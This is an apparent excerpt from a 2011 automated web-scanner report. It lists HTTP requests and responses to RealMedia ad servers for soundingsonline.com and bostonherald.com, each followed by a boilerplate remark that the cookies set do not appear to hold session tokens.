GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S Content-Length: 402 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.keenanauction.com/auction.cgi?&i=2039 Content-Length: 329 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.gssdesign.com/cmta_landing11/ Content-Length: 317 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.myonlinepubs.com/publication?i=59161 Content-Length: 324 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter Content-Length: 355 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter Content-Length: 355 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.gssdesign.com/cmta_landing11/ Content-Length: 317 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.keenanauction.com/auction.cgi?&i=2039 Content-Length: 329 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.nsboats.com/ Content-Length: 300 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p> <hr> <ad ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.acboatshow.com/ Content-Length: 303 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p> <hr>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:05:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.acboatshow.com/ Content-Length: 303 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p> <hr>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1 Host: oasc05139.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:06:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://www.nsboats.com/ Content-Length: 300 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p> <hr> <ad ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 13:39:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 13:39:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n');
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 13:39:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:04 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n' ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:28 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:07 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
